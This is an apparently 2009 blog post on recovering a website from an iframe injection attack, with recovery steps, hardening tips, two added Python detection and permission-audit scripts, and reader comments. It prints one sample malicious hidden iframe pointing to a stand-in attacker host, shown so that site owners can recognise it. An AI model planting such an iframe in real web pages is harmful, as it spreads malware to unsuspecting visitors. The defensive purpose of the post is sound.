Web Development Blog

06 Apr, 2009

Troubleshooting an IFrame Injection Attack

An IFrame injection attack is considered one of the most common and most basic cross-site scripting (XSS) attacks. If your website has recently been hit by an iframe attack, do not panic. Here are a few things you can do immediately after discovering that your website has been the victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period
It is recommended to take the website down, as you do not want to be distributing malware or viruses from your website to your visitors. The website should stay offline while you are recovering it.

2. Change all the passwords
Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website, including FTP passwords, SSH passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis
You may want to analyse the attack further and might need to refer to the exact injected source code in the future. Take a copy of the affected website in a compressed format, e.g. zip or gzip, and store it in a quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy
Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night; however, it is more reliable to have other backup solutions for your website. Scan your backup copy with anti-virus software like ZoneAlarm or Trend Micro before uploading it to the web server to ensure that the backup copy is free from viruses and Trojan horses.

5. Test the website and reopen
This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack originated
To ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it originated. Was it because of a security hole in your application? Was it caused by weak file permissions? Or is your server infected with a virus that injects this code into your website at regular intervals? You will need to understand how it happened in order to prevent it in the future. When necessary, obtain expert advice.

7. Perform appropriate security measures based on the analysis
Although you may have recovered your website, that does not mean it will not be attacked again. If the same security hole still exists, it is very likely that the website will be attacked again in the near future. Therefore, it is recommended that you take the necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.
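The scan in steps 3 to 5 can be scripted. The following is an added example, not code from the original post: it walks a copy of the site and flags iframes that point to a foreign host and are hidden the way the sample above is (width or height of 0 or 1, or hidden by CSS). The function names, the file-extension list and the trusted_hosts parameter are assumptions for illustration.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed heuristics, modelled on the sample iframe in this post.
HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
TINY = re.compile(r"\s*[01]\s*(px)?\s*", re.I)   # width/height of 0 or 1
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js", ".tpl", ".inc"}

class IframeFinder(HTMLParser):  # collects hidden iframes that load a foreign host
    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = trusted_hosts
        self.hits = []                            # (line number, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        try:
            host = (urlparse(a.get("src", "")).hostname or "").lower()
        except ValueError:                        # malformed URL: treat as foreign
            host = "?"
        external = bool(host) and host not in self.trusted_hosts
        hidden = bool(TINY.fullmatch(a.get("width", "x"))
                      or TINY.fullmatch(a.get("height", "x"))
                      or HIDING_CSS.search(a.get("style", "")))
        if external and hidden:
            self.hits.append((self.getpos()[0], a["src"]))

def scan_text(text, trusted_hosts=frozenset()):
    finder = IframeFinder(trusted_hosts)
    finder.feed(text)
    finder.close()
    return finder.hits                            # [(line, src), ...]

def scan_tree(root, trusted_hosts=frozenset()):
    """Walk a site copy; return {path: [(line, src), ...]} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read(), trusted_hosts)
                if hits:
                    report[path] = hits
    return report
```

Run scan_tree over the quarantined copy and over the backup before it is uploaded; an empty result only means no hidden iframe tag was found, since iframes built at runtime by obfuscated script inside a script element are not covered by this check.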

My experience and advice

I have encountered and recovered quite a few websites that had been attacked by malicious iframe exploits in recent years, and the common causes seem to be as follows:

  • The website is hosted on a cheap web hosting service
  • The website is using an old version of an open source application (e.g. WordPress 1.0) which has known security issues
  • File permissions on the server are not set appropriately (e.g. every file and folder on the server is set to 777 – read-write-execute)
  • Weaknesses in application code, for example insufficient input validation
  • FTP rather than SFTP is used
  • There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

  • Change your passwords periodically (say, at least once a month)
  • Keep your applications up-to-date. Always upgrade immediately when a new version is available.
  • Clean up files and directories on the web server. Make sure there are no old files with .bak or .txt extensions lying around
  • Ensure that appropriate file permissions are used for every file and directory on the web server
  • Consult with a security expert to obtain the best advice
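The file-permission and leftover-file items above can be checked with a short audit script. This is an added example, not code from the original post: the function name and the expected_files allowlist (so that a legitimate robots.txt is not reported) are assumptions.

```python
import os
import stat

# Extensions named in the post; expected_files is an assumed allowlist.
LEFTOVER_EXTENSIONS = {".bak", ".txt"}

def audit_webroot(root, expected_files=frozenset({"robots.txt"})):
    """Return sorted (relative path, issue, octal mode) tuples for a web root."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                  # do not follow symlinks
            if stat.S_ISLNK(st.st_mode):
                continue                         # a link's own mode bits mean nothing
            rel = os.path.relpath(path, root)
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:              # e.g. 777 or 666
                findings.append((rel, "world-writable", oct(mode)))
            ext = os.path.splitext(name)[1].lower()
            if (stat.S_ISREG(st.st_mode) and ext in LEFTOVER_EXTENSIONS
                    and name not in expected_files):
                findings.append((rel, "leftover file", oct(mode)))
    return sorted(findings)
```

Each finding is something to review rather than an automatic fix: an upload directory may need to be writable by the web server user, but it rarely needs to be writable by everyone.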

11 Responses to "Troubleshooting an IFrame Injection Attack"

1 | Akash Callikan

April 22nd, 2009 at 8:47 pm

I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

Now that I’ve cleared it, attacks have stopped. So you might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

Cheers :)

Akash

2 | Even I had the same problem

June 15th, 2009 at 8:00 pm

I have been facing the same problem since April.
Even now I don't know how to rectify it. I have used 20 jQuery files for usability and effects for my website.

I am searching for, still no permanent requiry.

If anybody wants to help me on this issue pls…

Thanks
Mahes

3 | Matrix127

June 24th, 2009 at 10:41 am

My website was attacked with this too.

I had a backup so restored it, but what I didn't realise was that I had a backup with the iframe injection. My website was on for an hour and then it was down again. I did an AV scan with Avast on the backup files and found the iframe virus, deleted it, did a full scan on my PC and now I can get my website on. But even though I will change the passwords and everything, I think this can still be a dangerous one, because if a visitor of your website has the same virus, they can easily infect you with it without knowing they had the virus. It can actually be sitting on his website ready to fire if you have visited such a website or have been redirected to it somehow. One of those is the Firefox pop-ups: never accept anything that pops up unless you have set it to do so, and if you do by mistake then you get redirected to the infected website and get infected yourself, and now you are the virus who goes and visits the websites and infects all which have no strong wall and with lots of ports open. One of the main and easy security measures on Firefox you should have is “KeyScrambler”: anything you type becomes encrypted text. And, not good for all but most, is Adblock Plus, which is an add-on for Firefox; this stops any link that you filter, so it may come in handy for blocking lots of ads and stops you being directed to visit an infected site that can infect you. These are my little suggestions to get more security on your PC and your web server, and make sure you learn all about what file permission settings are all about; that will also give you some extra security.

All this information I gained through searches and trials and from my silly thinking that I had enough security set up, obviously not! My only hope is that we never give up and fight back with these issues and help and share information with each other, then hopefully you won't be the next victim! …

4 | Zyad Rujeedawa

July 2nd, 2009 at 3:38 pm

For .net just add the following in the web.config file

This will prevent scripting attacks.

5 | Zyad Rujeedawa

July 2nd, 2009 at 3:44 pm

Looks like this site has removed my coding :-) to prevent scripting attacks :-)

So in the web.config file, under system.web, just set the property validateRequest of the pages tag to TRUE.

6 | Reejesh

July 8th, 2009 at 7:40 am

Any such settings in the .htaccess file to prevent this?

7 | Jovani

September 3rd, 2009 at 5:21 pm

I have encountered the same problem. Good thing I have restored the site. But I was wondering what might have caused this kind of injection? Is my computer infected with a virus, does the server have the virus, or something?

8 | Steve

November 10th, 2009 at 1:03 am

Grab a copy of Upload Guardian for your VPS/dedicated server. It scans FTP/PHP uploads in real-time and blocks the attacking IP in the firewall.

9 | izdelava spletnih strani

December 5th, 2009 at 3:08 am

I see you are experts for iframes and stuff. Can anyone help me? I'm having trouble: I can't open my pics with target=”_top” while in an iframe.

11 | advertising

February 28th, 2010 at 5:51 pm

Can't you edit your .htaccess file to prevent this?
